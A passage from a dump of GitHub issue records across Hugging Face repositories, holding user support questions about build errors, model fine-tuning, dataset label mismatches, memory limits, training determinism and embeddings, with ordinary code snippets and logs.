RUN npm run build:\r\n#0 5.666 at MessagePort. (node:internal/worker:216:57)\r\n#0 5.666 at [nodejs.internal.kHybridDispatch] (node:internal/event_target:761:20)\r\n#0 5.666 at exports.emitMessage (node:internal/per_context/messageport:23:28)\r\n#0 5.666\r\n#0 5.666 Node.js v19.9.0\r\n#0 5.751 npm notice\r\n#0 5.751 npm notice New major version of npm available! 
9.6.3 -> 10.2.4\r\n#0 5.751 npm notice Changelog: \r\n#0 5.751 npm notice Run `npm install -g npm@10.2.4` to update!\r\n#0 5.751 npm notice\r\n#------\r\n#Dockerfile:49\r\n#--------------------\r\n#47 | npm ci\r\n#48 |\r\n#49 | >>> RUN npm run build\r\n#50 |\r\n#51 | FROM ghcr.io/huggingface/text-generation-inference:latest\r\n#--------------------\r\n#ERROR: failed to solve: process \"/bin/sh -c npm run build\" did not complete successfully: exit code: 1", "url": "https://github.com/huggingface/chat-ui/issues/576", "state": "open", "labels": [ "support", "spaces" ], "created_at": "2023-11-23T12:23:06Z", "updated_at": "2023-11-30T14:11:32Z", "comments": 1, "user": "simon376" }, { "repo": "huggingface/transformers", "number": 27666, "title": "how to remove punctuation marks.", "body": "### System Info\n\ni trained t5-large for translation.\r\n\r\nthe result of train was good\r\n\r\nBut when i input some sentence, the result is like that \"What are you doing now?.??.....\"\r\n\r\n[?.??......] <- how to delete that punctuation marks.\r\n\r\ni put some parameter like max_length. But i can not solve that situation\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\nc\n\n### Expected behavior\n\ncfdvf", "url": "https://github.com/huggingface/transformers/issues/27666", "state": "closed", "labels": [], "created_at": "2023-11-23T07:21:33Z", "updated_at": "2023-12-31T08:03:43Z", "user": "chanyong-owl" }, { "repo": "huggingface/blog", "number": 1655, "title": "how to scale fine-tuning whisper in English?", "body": "I'm attempting to fine-tune whisper using the excellent hugging face tut: https://huggingface.co/blog/fine-tune-whisper. The delta between the tut's case and my case is that I am using English which has 1M more test cases (and also I'm using big GPUs so I am using `whisper-large-v3`).\r\n\r\nNo matter how much compute I throw at the core data preparation step (e.g. take a look at `num_proc`):\r\n\r\n`common_voice = common_voice.map(prepare_dataset, remove_columns=common_voice.column_names[\"train\"], num_proc=108)`\r\n\r\nI still only prepare the data at about 30 examples / s. For 1M examples this doesn't scale. My last test was on an 8 GPU 112 vCPU instance and still there was no change. Indeed `htop` shows that all 112 of my vCPUs are engaged, but the actual prep speed remains flat across all compute types. The only thing I haven't tried is crazy fast storage like NVMe, which I'm going to do, but I have a feeling it has to do with either the `datasets` library configuration or something else. I've never had problems with GPUs or whisper previously so I'm a bit baffled as to what the issue could. I've followed the tutorial to a 't' except for changing the language to `en`, whisper to `whisper-large-v3` and `num_proc` to higher parallels. 
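On the Whisper data-preparation bottleneck above: one lever worth checking before faster storage is batching the map call, since per-example calls into the feature extractor carry heavy Python overhead. A hedged sketch, assuming `common_voice`, `feature_extractor` and `tokenizer` are set up as in the tutorial (if throughput still does not move, the bottleneck is likely disk I/O, as suspected):

```python
def prepare_dataset_batched(batch):
    audio = batch["audio"]
    # One vectorized call per batch instead of one call per example.
    batch["input_features"] = feature_extractor(
        [a["array"] for a in audio],
        sampling_rate=audio[0]["sampling_rate"],  # uniform after cast_column
    ).input_features
    batch["labels"] = tokenizer(batch["sentence"]).input_ids
    return batch

common_voice = common_voice.map(
    prepare_dataset_batched,
    batched=True,
    batch_size=32,
    num_proc=16,  # beyond ~16 workers, I/O tends to dominate over CPU
    remove_columns=common_voice.column_names["train"],
)
```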
Any insight would be greatly appreciated!", "url": "https://github.com/huggingface/blog/issues/1655", "state": "open", "labels": [], "created_at": "2023-11-22T22:45:29Z", "updated_at": "2024-03-10T06:55:47Z", "user": "jsteinberg-rbi" }, { "repo": "huggingface/datasets", "number": 6446, "title": "Speech Commands v2 dataset doesn't match AST-v2 config", "body": "### Describe the bug\n\n[According](https://huggingface.co/MIT/ast-finetuned-speech-commands-v2) to `MIT/ast-finetuned-speech-commands-v2`, the model was trained on the Speech Commands v2 dataset. However, while the model config says the model should have 35 class labels, the dataset itself has 36 class labels. Moreover, the class labels themselves don't match between the model config and the dataset. It is difficult to reproduce the data used to fine tune `MIT/ast-finetuned-speech-commands-v2`.\n\n### Steps to reproduce the bug\n\n```\r\n>>> model = ASTForAudioClassification.from_pretrained(\"MIT/ast-finetuned-speech-commands-v2\")\r\n>>> model.config.id2label\r\n{0: 'backward', 1: 'follow', 2: 'five', 3: 'bed', 4: 'zero', 5: 'on', 6: 'learn', 7: 'two', 8: 'house', 9: 'tree', 10: 'dog', 11: 'stop', 12: 'seven', 13: 'eight', 14: 'down', 15: 'six', 16: 'forward', 17: 'cat', 18: 'right', 19: 'visual', 20: 'four', 21: 'wow', 22: 'no', 23: 'nine', 24: 'off', 25: 'three', 26: 'left', 27: 'marvin', 28: 'yes', 29: 'up', 30: 'sheila', 31: 'happy', 32: 'bird', 33: 'go', 34: 'one'}\r\n\r\n>>> dataset = load_dataset(\"speech_commands\", \"v0.02\", split=\"test\")\r\n>>> torch.unique(torch.Tensor(dataset['label']))\r\ntensor([ 0., 1., 2., 3., 4., 5., 6., 7., 8., 9., 10., 11., 12., 13.,\r\n 14., 15., 16., 17., 18., 19., 20., 21., 22., 23., 24., 25., 26., 27.,\r\n 28., 29., 30., 31., 32., 33., 34., 35.])\r\n```\r\nIf you try to explore the [dataset itself](https://huggingface.co/datasets/speech_commands/viewer/v0.02/test), you can see that the id to label does not match what is provided by `model.config.id2label`.\r\n\n\n### Expected behavior\n\nThe labels should match completely and there should be the same number of label classes between the model config and the dataset itself.\n\n### Environment info\n\ndatasets = 2.14.6, transformers = 4.33.3", "url": "https://github.com/huggingface/datasets/issues/6446", "state": "closed", "labels": [], "created_at": "2023-11-22T20:46:36Z", "updated_at": "2023-11-28T14:46:08Z", "comments": 3, "user": "vymao" }, { "repo": "huggingface/alignment-handbook", "number": 45, "title": "Reproducing of Lora Model Result on MT-Bench", "body": "Recently, I attempted to fit the DPO on my own dataset.\r\nInitially, I tried to reproduce the results of your LORA model( 7.43 on MT-Bench).\r\nHowever, I encountered some issues. \r\nDespite using all your parameters and data, here are my results on MT-Bench:\r\n| Model | MT-Bench |\r\n|--------|--------|\r\n| Zephyr-SFT-Lora-Own | 6.37 |\r\n| Zephyr-DPO-Lora-Own | 6.95 | \r\n\r\nThen, I downloaded your models from [here](https://huggingface.co/alignment-handbook), and the results were nearly the same as mine.\r\n| Model | MT-Bench |\r\n|--------|--------|\r\n| Zephyr-SFT-Lora| 6.4|\r\n| Zephyr-DPO-Lora| 6.93 | \r\n\r\nDPO does help improve performance on MT-Bench, but I can't achieve a score of **7.43**. Is there any difference between the model described in your paper and the model available on your homepage? 
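On the Speech Commands label mismatch above: the HF `speech_commands` v0.02 split carries a 36th class that the 35-label AST config omits (assumed here to be `_silence_`), and the integer ids are ordered differently, so aligning by *name* is safer than comparing ids. A sketch:

```python
from datasets import load_dataset
from transformers import ASTForAudioClassification

model = ASTForAudioClassification.from_pretrained("MIT/ast-finetuned-speech-commands-v2")
dataset = load_dataset("speech_commands", "v0.02", split="test")

names = dataset.features["label"].names  # 36 names, in dataset order
known = set(model.config.label2id)       # the 35 labels the model knows

# Drop examples of the class the model was not trained on, then re-index
# the remaining labels into the model's id space under a new column.
dataset = dataset.filter(lambda ex: names[ex["label"]] in known)
dataset = dataset.map(lambda ex: {"model_label": model.config.label2id[names[ex["label"]]]})
```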
\r\nOr could it be the difference between the full and LORA?\r\n\r\nBy the way, I truly love the \"yaml style\" argument parser; it's clear and elegant!\r\n@edbeeching @lewtun \r\n\r\n", "url": "https://github.com/huggingface/alignment-handbook/issues/45", "state": "open", "labels": [], "created_at": "2023-11-22T03:42:32Z", "updated_at": "2023-12-11T17:09:32Z", "comments": 27, "user": "wlhgtc" }, { "repo": "huggingface/optimum", "number": 1551, "title": "Running llama-2-13b resulted in `Killed`", "body": "### System Info\n\n```shell\nThis is my run.py code:\r\n\r\n import torch\r\n import transformers\r\n import requests\r\n print(torch.cuda.is_available())\r\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n # Load model and adapter weights from local directory\r\n model = transformers.AutoModelForCausalLM.from_pretrained(\"/home/maxloo/src/pastoring/llama/llama-2-13b\")\r\n model.to(device)\r\n adapter = transformers.AutoModelForCausalLM.from_pretrained(\"/home/maxloo/src/pastoring/adapter\", config=transformers.configuration.AdapterConfig.from_json_file(\"adapter_config.json\"))\r\n model.load_state_dict(adapter.state_dict())\r\n adapter.load_state_dict(model.state_dict())\r\n # Define prompt\r\n prompt = \"Hello, I am a chatbot.\"\r\n # Perform inference\r\n response = model.generate(prompt, max_length=50)\r\n # Print response\r\n print(response)\r\n\r\nThis is my adapter_config.json code:\r\n\r\n {\r\n \"base_model_name_or_path\": \"../llama/llama-2-13b/\",\r\n \"bias\": \"none\",\r\n \"enable_lora\": null,\r\n \"fan_in_fan_out\": false,\r\n \"inference_mode\": true,\r\n \"init_lora_weights\": true,\r\n \"lora_alpha\": 16,\r\n \"lora_dropout\": 0.05,\r\n \"merge_weights\": false,\r\n \"modules_to_save\": null,\r\n \"peft_type\": \"LORA\",\r\n \"r\": 16,\r\n \"target_modules\": [\r\n \"q_proj\",\r\n \"k_proj\",\r\n \"v_proj\",\r\n \"o_proj\"\r\n ],\r\n \"task_type\": \"CAUSAL_LM\",\r\n \"task\": \"question_answering\",\r\n \"domain\": \"general\"\r\n }\r\n\r\nThese are my hardware specs:\r\n\r\n Intel Core i7-13700HX, NVIDIA RTX 4060, 32GB DDR5, 1TB SSD\r\n\r\nI'm using Windows 11 WSL2 Bash to run this command:\r\n\r\n python3 run.py\r\n\r\nI have set my .wslconfig file as follows:\r\n\r\n [wsl2]\r\n memory=24GB\r\n processors=24\r\n\r\nI expect a chat message to be displayed and a prompt for my chat input, but this is the actual output:\r\n\r\n Killed\r\n\r\nHow do I resolve this? Should I be testing llama-13b first before llama-2-13b?\n```\n\n\n### Who can help?\n\n@echarlaix, \r\n@philschmid\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [X] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\npython3 run.py\r\n![Screenshot 2023-11-21 211036](https://github.com/huggingface/optimum/assets/71763812/fc5b7e1c-1e57-41e5-a986-130681eba41d)\r\n\n\n### Expected behavior\n\nI expect a chat message to be displayed and a prompt for my chat input, but this is the actual output:\r\n\r\n Killed\r\n\r\nHow do I resolve this? Should I be testing llama-13b first before llama-2-13b? 
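On the `Killed` report above: that message is the Linux OOM killer, and the script has two separate problems. A 13B model in fp32 needs roughly 52 GB of host RAM (far beyond the 24 GB WSL cap), and `model.generate` is being passed a raw string instead of token ids. A hedged sketch that addresses both, assuming the local path from the report:

```python
import torch
from transformers import AutoModelForCausalLM, AutoTokenizer

model_path = "/home/maxloo/src/pastoring/llama/llama-2-13b"

model = AutoModelForCausalLM.from_pretrained(
    model_path,
    torch_dtype=torch.float16,   # halves the ~52 GB fp32 footprint
    low_cpu_mem_usage=True,      # stream shards instead of materializing twice
    device_map="auto",           # offload what the 8 GB RTX 4060 cannot hold
)
tokenizer = AutoTokenizer.from_pretrained(model_path)

inputs = tokenizer("Hello, I am a chatbot.", return_tensors="pt").to(model.device)
output_ids = model.generate(**inputs, max_new_tokens=40)
print(tokenizer.decode(output_ids[0], skip_special_tokens=True))
```

Loading the LoRA adapter would then go through `peft.PeftModel.from_pretrained(model, adapter_path)` rather than the `transformers.configuration.AdapterConfig` API used in the report, which does not exist.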
", "url": "https://github.com/huggingface/optimum/issues/1551", "state": "closed", "labels": [ "bug" ], "created_at": "2023-11-21T13:11:40Z", "updated_at": "2024-01-09T15:58:09Z", "comments": 1, "user": "maxloopinmok" }, { "repo": "huggingface/optimum-quanto", "number": 32, "title": "Are threre some exmples show how to export onnx model ? torch.onnx.export", "body": "", "url": "https://github.com/huggingface/optimum-quanto/issues/32", "state": "closed", "labels": [], "created_at": "2023-11-21T11:33:37Z", "updated_at": "2024-03-13T08:15:51Z", "user": "youkiwang" }, { "repo": "huggingface/transformers", "number": 27615, "title": "How to get the number of trainable parameters for a hf model", "body": "### Feature request\r\n'\r\npeft_parameters = LoraConfig(\r\n lora_alpha=16,\r\n lora_dropout=0.1,\r\n r=8,\r\n bias=\"none\",\r\n task_type=\"CAUSAL_LM\"\r\n)\r\ntrain_params = TrainingArguments(\r\n output_dir=\"./results_modified\",\r\n num_train_epochs=1,\r\n per_device_train_batch_size=4,\r\n gradient_accumulation_steps=1,\r\n optim=\"paged_adamw_32bit\",\r\n save_steps=25,\r\n logging_steps=25,\r\n learning_rate=2e-4,\r\n weight_decay=0.001,\r\n fp16=False,\r\n bf16=False,\r\n max_grad_norm=0.3,\r\n max_steps=-1,\r\n warmup_ratio=0.03,\r\n group_by_length=True,\r\n lr_scheduler_type=\"constant\",\r\n report_to=\"tensorboard\"\r\n)\r\nfine_tuning = SFTTrainer(\r\n model=base_model,\r\n train_dataset=training_data,\r\n peft_config=peft_parameters,\r\n dataset_text_field=\"text\",\r\n tokenizer=llama_tokenizer,\r\n args=train_params\r\n)\r\n\r\nfine_tuning.train()\r\n\r\nI am using the above code for model training with Lora. I wonder after applying to Lora. How could I check the number of trainable parameters of the model before and after?\r\n\r\n### Motivation\r\n\r\nUnderstand the training process well\r\n\r\n### Your contribution\r\n\r\nI'd love to ", "url": "https://github.com/huggingface/transformers/issues/27615", "state": "closed", "labels": [], "created_at": "2023-11-21T00:37:01Z", "updated_at": "2023-11-21T19:28:32Z", "user": "mathmax12" }, { "repo": "huggingface/chat-ui", "number": 571, "title": "trying to replicate the api search with the local search option", "body": "When I try searching for information on the site (huggingface.co/chat) it works fine and gives correct information, but when doing the same thing using the same model I get hallucinations..\r\nIve tried all sorts of temperature settings and models.\r\nThis is the result locally:\r\n![image](https://github.com/huggingface/chat-ui/assets/20077386/cee5a762-3004-4953-9a9b-c6dc2291c569)\r\nThis is with the site:\r\n![image](https://github.com/huggingface/chat-ui/assets/20077386/0f1001bf-6c16-4dc0-84b5-b668d135c1d6)\r\nThe sources look the smae on both but the actual response is always not even real information..\r\nThis is my current config:\r\n\r\nMONGODB_URL=mongodb://localhost:27017\r\nPUBLIC_APP_NAME=PrivateGPT\r\nMODELS=`[\r\n {\r\n \"name\": \"text-generation-webui\",\r\n \"id\": \"text-generation-webui\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 12,\r\n \"truncate\": 1000,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": []\r\n },\r\n \"endpoints\": [{\r\n \"type\" : \"openai\",\r\n \"baseURL\": \"http://127.0.0.1:5000/v1/\"\r\n }]\r\n }\r\n]`\r\n\r\n\r\nTypeError [ERR_INVALID_STATE]: Invalid state: Controller is already closed\r\n at new NodeError (node:internal/errors:405:5)\r\n at ReadableStreamDefaultController.enqueue 
(node:internal/webstreams/readablestream:1040:13)\r\n at update (C:/ChatUI/src/routes/conversation/[id]/+server.ts:155:20)\r\n at Object.start (C:/ChatUI/src/routes/conversation/[id]/+server.ts:189:15)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5) {\r\n code: 'ERR_INVALID_STATE'\r\n}\r\nTypeError [ERR_INVALID_STATE]: Invalid state: Controller is already closed\r\n at new NodeError (node:internal/errors:405:5)\r\n at ReadableStreamDefaultController.enqueue (node:internal/webstreams/readablestream:1040:13)\r\n at update (C:/ChatUI/src/routes/conversation/[id]/+server.ts:155:20)\r\n at Object.start (C:/ChatUI/src/routes/conversation/[id]/+server.ts:189:15)\r\n at process.processTicksAndRejections (node:internal/process/task_queues:95:5) {\r\n", "url": "https://github.com/huggingface/chat-ui/issues/571", "state": "closed", "labels": [ "support" ], "created_at": "2023-11-20T20:57:23Z", "updated_at": "2023-12-05T15:19:49Z", "comments": 29, "user": "iChristGit" }, { "repo": "huggingface/trl", "number": 1014, "title": "How to avoid training radomness?", "body": "I\u2019m using the `trl.SFTTrainer` to fine-tune Vicuna, and I\u2019m using the same data and parameters for fine-tuning. However, I\u2019ve noticed that even after setting:\r\n\r\n```\r\ndef set_seed(seed=42):\r\n # set seed for all possible avenues of stochasticity\r\n numpy.random.seed(seed=seed)\r\n random.seed(seed)\r\n torch.manual_seed(seed)\r\n torch.cuda.manual_seed(seed)\r\n torch.cuda.manual_seed_all(seed)\r\n torch.backends.cudnn.benchmark = False\r\n torch.backends.cudnn.deterministic = True\r\n\r\ntraining_args = TrainingArguments(\r\n report_to=\"none\",\r\n output_dir=str(ckpt_path),\r\n do_eval=False,\r\n save_strategy=\"epoch\",\r\n evaluation_strategy=\"no\",\r\n num_train_epochs=training_epochs,\r\n seed=42,\r\n )\r\n ```\r\n \r\nthe fine-tuned checkpoint\u2019s evaluation remains unstable. Every time I fine-tune with the same dataset, I get significantly different results. 
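On the run-to-run variance described above: transformers ships helpers that cover more randomness sources than a hand-rolled `set_seed` (dataloader worker seeding, cuBLAS workspaces, deterministic kernel selection). A sketch (note that `use_flash_attention_2=True` is itself a likely culprit, since FlashAttention's backward pass is non-deterministic):

```python
from transformers import set_seed
from transformers.trainer_utils import enable_full_determinism

set_seed(42)                 # python / numpy / torch / cuda seeds
enable_full_determinism(42)  # additionally forces deterministic CUDA kernels
                             # (CUBLAS_WORKSPACE_CONFIG, cudnn.deterministic,
                             # torch.use_deterministic_algorithms) - slower,
                             # but stable across runs on fixed hardware/versions
```

The same switch is exposed as `TrainingArguments(full_determinism=True)`.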
How can I ensure the stability of my fine-tuning?\r\n\r\nI also tried this:\r\n\r\nhttps://discuss.huggingface.co/t/fixing-the-random-seed-in-the-trainer-does-not-produce-the-same-results-across-runs/3442\r\n\r\nBut I was wrong even with this codes:\r\n\r\n```\r\n def model_init():\r\n return AutoModelForCausalLM.from_pretrained(\r\n \"/data/ckpts/huggingface/models/models--lmsys--vicuna-7b-v1.5/snapshots/de56c35b1763eaae20f4d60efd64af0a9091ebe5\",\r\n device_map=\"auto\",\r\n torch_dtype=torch.bfloat16,\r\n use_flash_attention_2=True,\r\n )\r\n\r\n training_args = TrainingArguments(\r\n report_to=\"none\",\r\n output_dir=str(ckpt_path),\r\n do_eval=False,\r\n save_strategy=\"epoch\",\r\n evaluation_strategy=\"no\",\r\n num_train_epochs=training_epochs,\r\n seed=42,\r\n )\r\n trainer = SFTTrainer(\r\n model_init=model_init,\r\n args=training_args,\r\n train_dataset=mapped_dataset,\r\n dataset_text_field=\"text\",\r\n data_collator=data_collator,\r\n max_seq_length=1500,\r\n )\r\n``` \r\n \r\nThis would end in errors.\r\n\r\n```\r\nTraceback (most recent call last):\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/utils/_errors.py\", line 261, in hf_raise_for_status\r\n response.raise_for_status()\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/requests/models.py\", line 1021, in raise_for_status\r\n raise HTTPError(http_error_msg, response=self)\r\nrequests.exceptions.HTTPError: 401 Client Error: Unauthorized for url: https://huggingface.co/None/resolve/main/config.json\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nTraceback (most recent call last):\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/transformers/utils/hub.py\", line 429, in cached_file\r\n resolved_file = hf_hub_download(\r\n ^^^^^^^^^^^^^^^^\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/utils/_validators.py\", line 118, in _inner_fn\r\n return fn(*args, **kwargs)\r\n ^^^^^^^^^^^^^^^^^^^\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/file_download.py\", line 1346, in hf_hub_download\r\n raise head_call_error\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/file_download.py\", line 1232, in hf_hub_download\r\n metadata = get_hf_file_metadata(\r\n ^^^^^^^^^^^^^^^^^^^^^\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/utils/_validators.py\", line 118, in _inner_fn\r\n return fn(*args, **kwargs)\r\n ^^^^^^^^^^^^^^^^^^^\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/file_download.py\", line 1608, in get_hf_file_metadata\r\n hf_raise_for_status(r)\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/huggingface_hub/utils/_errors.py\", line 293, in hf_raise_for_status\r\n raise RepositoryNotFoundError(message, response) from e\r\nhuggingface_hub.utils._errors.RepositoryNotFoundError: 401 Client Error. 
(Request ID: Root=1-655b8b21-096243713e568c65194e1a69;8e4415fe-8069-43e1-8412-fdd028a8ebcd)\r\n\r\nRepository Not Found for url: https://huggingface.co/None/resolve/main/config.json.\r\nPlease make sure you specified the correct `repo_id` and `repo_type`.\r\nIf you are trying to access a private or gated repo, make sure you are authenticated.\r\nInvalid username or password.\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nTraceback (most recent call last):\r\n File \"/home/cyzhao/main/test_scripts/main.py\", line 402, in \r\n finetune_vicuna(\r\n File \"/home/cyzhao/main/test_scripts/main.py\", line 207, in finetune_vicuna\r\n trainer = SFTTrainer(\r\n ^^^^^^^^^^^\r\n File \"/home/cyzhao/miniconda3/envs/prompt/lib/python3.11/site-packages/trl/trainer/sft_trainer.py\", line 162, in __init__\r\n model = AutoModelForCausalLM.from_pretrained(model)\r\n ^^^^^^^", "url": "https://github.com/huggingface/trl/issues/1014", "state": "closed", "labels": [], "created_at": "2023-11-20T16:47:28Z", "updated_at": "2024-01-03T15:05:11Z", "user": "zhaochenyang20" }, { "repo": "huggingface/candle", "number": 1349, "title": "How to pass bounding box instead of points in the segment-anything example?", "body": "Is it possible to pass a bounding box instead of points when using the segment-anything model? Is this just 4 points?", "url": "https://github.com/huggingface/candle/issues/1349", "state": "open", "labels": [], "created_at": "2023-11-20T15:44:22Z", "updated_at": "2023-11-20T15:44:22Z", "user": "svelterust" }, { "repo": "huggingface/alignment-handbook", "number": 43, "title": "Did you use RMSprop or AdamW as the optimizer?", "body": "Hi to whoever is reading this \ud83e\udd17 \r\n\r\n## Question\r\n\r\nAfter reading the Zephyr pre-printed paper https://arxiv.org/pdf/2310.16944.pdf and going through the configuration files here, I saw that there was a mismatch between the optimizer used in https://github.com/huggingface/alignment-handbook/blob/main/recipes/zephyr-7b-beta/dpo/config_full.yaml, and the one reported in the paper, AdamW.\r\n\r\nSo the question is, did you use RMSprop to run the full DPO fine-tuning or AdamW with no weight decay as stated in the paper?\r\n\r\nThanks in advance!", "url": "https://github.com/huggingface/alignment-handbook/issues/43", "state": "closed", "labels": [], "created_at": "2023-11-20T15:23:03Z", "updated_at": "2024-03-07T06:55:07Z", "comments": 3, "user": "alvarobartt" }, { "repo": "huggingface/sentence-transformers", "number": 2359, "title": "How to evaluate the result of dataset that does not have any labels", "body": "Hi,\r\n\r\nI was trying to look at the different evaluation metrics that are provided to SentenceTransformers. I have a column of text in my dataset that I compare against a query and get the top k similarity using cosine similarity. I do not know if there is any method to evaluate the result. Should I consider the cosine similarity score as my evaluation metric as well? By evaluation, I mean, how can I show that the result I got is good? Is reasonable?\r\n\r\nfrom sentence_transformers import SentenceTransformer, util\r\nimport pandas as pd\r\n\r\n# Load a pre-trained model\r\nmodel = SentenceTransformer('msmarco-distilbert-cos-v5')\r\n\r\n# Example query\r\nquery = \"Semantic search example query\"\r\n\r\n# Example corpus\r\ncorpus = [\"Example sentence 1\", \"Example sentence 2\", \"Example sentence 3\", ...] 
# Add more sentences to your corpus\r\n\r\n# Encode the query and corpus into embeddings\r\nquery_embedding = model.encode(query, convert_to_tensor=True)\r\ncorpus_embeddings = model.encode(corpus, convert_to_tensor=True)\r\n\r\n# Compute cosine similarities\r\ncosine_similarities = util.pytorch_cos_sim(query_embedding, corpus_embeddings)[0]\r\n\r\n# Get indices of the 3 nearest neighbors\r\nindices_nearest_neighbors = pd.Series(cosine_similarities).nlargest(3).index\r\n\r\n# Retrieve the 3 nearest neighbors\r\nnearest_neighbors = [corpus[i] for i in indices_nearest_neighbors]\r\n\r\n# Print the results\r\nprint(f\"Query: {query}\")\r\nprint(\"3 Nearest Neighbors:\")\r\nfor neighbor in nearest_neighbors:\r\n print(\"-\", neighbor)\r\n\r\n\r\n\r\n", "url": "https://github.com/huggingface/sentence-transformers/issues/2359", "state": "open", "labels": [], "created_at": "2023-11-20T14:52:21Z", "updated_at": "2023-11-20T14:52:21Z", "user": "Yarmohamadshr" }, { "repo": "huggingface/alignment-handbook", "number": 42, "title": "How to QLoRA training with ZeRO-3 on two or more GPUs?", "body": "I added a 4-bit load after the command LoRA training with ZeRO-3 on two or more GPUs to achieve a mix of QLoRA and ZeRO-3. But the program encountered the following error:\r\nRuntimeError: expected there to be only one unique element in .all_gather_coalesced.. at 0x7f2ec8daf900> \r\nThe command is:\r\nACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/deepspeed_zero3.yaml --num_processes=2 scripts/run_sft.py recipes/zephyr-7b-beta/sft/config_lora.yaml --load_in_4bit=true\r\n\r\n", "url": "https://github.com/huggingface/alignment-handbook/issues/42", "state": "open", "labels": [], "created_at": "2023-11-20T14:13:36Z", "updated_at": "2024-05-17T00:27:27Z", "user": "Di-Zayn" }, { "repo": "huggingface/transformers", "number": 27600, "title": "How to get input sentence embedding from Llama or Llama2?", "body": "I'm trying to get the sentence embedding that I input, I checked some common practice to do it, but I'm not sure I'm doing the it right. Who may be help? @gante Thanks if you can be help. my code is as below: \r\n\r\n```\r\n model = LlamaForCausalLM.from_pretrained(\r\n args.pretrained_name_or_path,\r\n torch_dtype=torch.float16,\r\n device_map=device,\r\n)\r\ntokenizer = LlamaTokenizer.from_pretrained(args.pretrained_name_or_path, fast_tokenizer=True)\r\nmodel.to(device)\r\nmodel.eval()\r\ntokenizer.pad_token_id = 0\r\ntokenizer.padding_side = \"left\"\r\n\r\nfor i in range(0, len(sentences), batch_size):\r\n batch_sentences = sentences[i: i+batch_size]\r\n inputs = tokenizer(batch_sentences, padding=True, truncation=False, return_tensors='pt')\r\n inputs = inputs.to(device)\r\n\r\n with torch.no_grad():\r\n outputs = model(**inputs, output_hidden_states=True)\r\n hidden_states = outputs.hidden_states[-1]\r\n sentence_embeddings = hidden_states[:, -1, :] # # here is using the **last token's** last layer hidden states as sentence embeddings,\r\n # or sentence_embeddings = outputs.hidden_states[-1].mean(dim=1) # here use average sentence embedding. 
\r\n # and I'm not sure which one is better.\r\n embeddings.append(sentence_embeddings.cpu())\r\n\r\nembeddings = torch.cat(embeddings, dim=0)\r\n```\r\n\r\n", "url": "https://github.com/huggingface/transformers/issues/27600", "state": "closed", "labels": [], "created_at": "2023-11-20T13:18:08Z", "updated_at": "2023-11-22T14:32:26Z", "user": "waterluck" }, { "repo": "huggingface/transformers", "number": 27592, "title": "How to always use initial prompt in Whisper?", "body": "I checked this PR (#22496 ) but still can't figure out how to always use the initial prompt. is it possible to provide a use case?", "url": "https://github.com/huggingface/transformers/issues/27592", "state": "closed", "labels": [], "created_at": "2023-11-19T18:35:23Z", "updated_at": "2023-11-20T08:29:41Z", "user": "GanymedeNil" }, { "repo": "huggingface/pytorch-image-models", "number": 2038, "title": "how to run the efficientmit.py", "body": "**Is your feature request related to a problem? Please describe.**\r\nA clear and concise description of what the problem is.\r\n\r\n**Describe the solution you'd like**\r\nA clear and concise description of what you want to happen.\r\n\r\n**Describe alternatives you've considered**\r\nA clear and concise description of any alternative solutions or features you've considered.\r\n\r\n**Additional context**\r\nAdd any other context or screenshots about the feature request here.\r\n", "url": "https://github.com/huggingface/pytorch-image-models/issues/2038", "state": "closed", "labels": [ "enhancement" ], "created_at": "2023-11-19T02:50:59Z", "updated_at": "2023-11-19T17:16:48Z", "user": "1377534928" }, { "repo": "huggingface/chat-ui", "number": 566, "title": "Is Chat-UI gonna support the new Assistant API?", "body": "They store the threads, and there's also multi-modal support", "url": "https://github.com/huggingface/chat-ui/issues/566", "state": "open", "labels": [ "enhancement", "models" ], "created_at": "2023-11-19T02:06:44Z", "updated_at": "2023-11-20T08:42:49Z", "comments": 1, "user": "wayliums" }, { "repo": "huggingface/alignment-handbook", "number": 40, "title": "How do I get the training scrips to utilize all my GPUs?", "body": "Hello there,\r\n\r\nI'm running this script:\r\n```\r\nACCELERATE_LOG_LEVEL=info accelerate launch --config_file recipes/accelerate_configs/multi_gpu.yaml --num_processes=1 scripts/run_sft.py recipes/zephyr-7b-beta/sft/config_lora.yaml\r\n```\r\n\r\n... but on my machine with 2x3090s ... only GPU 0 is being utilized. \r\n\r\nWhat do I need to change to utlize both of my 3090s for the training run?\r\n\r\nThanks", "url": "https://github.com/huggingface/alignment-handbook/issues/40", "state": "closed", "labels": [], "created_at": "2023-11-19T00:11:24Z", "updated_at": "2023-11-19T01:20:21Z", "user": "ohmeow" }, { "repo": "huggingface/transformers.js", "number": 401, "title": "[Question | Bug] What am I doing wrong while using the `question-answering` model?", "body": "## The Problem\r\n\r\nI'm trying to use `question-answering` model to answer simple questions in a given context. But I always get a TypeError about floats. I guess that's an internal issue, because at top level of code I am not using floating point numbers. 
